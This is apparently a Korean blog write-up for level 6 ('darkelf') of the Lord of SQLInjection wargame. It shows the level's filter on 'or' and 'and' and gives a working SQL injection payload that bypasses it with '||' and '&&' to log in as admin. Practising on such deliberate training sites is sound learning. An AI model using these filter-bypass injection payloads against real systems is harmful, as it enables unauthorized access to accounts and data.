본문 바로가기

#WarGame/Lord of SQLInjection

Lord of SQLInjection 6번 darkelf

반응형

https://los.rubiya.kr/

 

Lord of SQLInjection

 

los.rubiya.kr

 

Lord of SQLInjection 6번 darkelf

 

  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");

or 와 and가 필터링이 되었다.

 

or 우회기법 ==> ||

and 우회기법 ==> %26%26

 

 

 

?pw=%27%20||%20%271%27=%271%27%20%26%26%20id=%27admin%27%23

pw='' or '1'='1' and id='admin' 

저번 문제와 똑같은 방식을 썼지만 여기서 or와 and만 바꾸면 된다.

pw='' || '1'='1' && id='admin'#'

 

 

 

 

 

 

 

 

반응형

'#WarGame > Lord of SQLInjection' 카테고리의 다른 글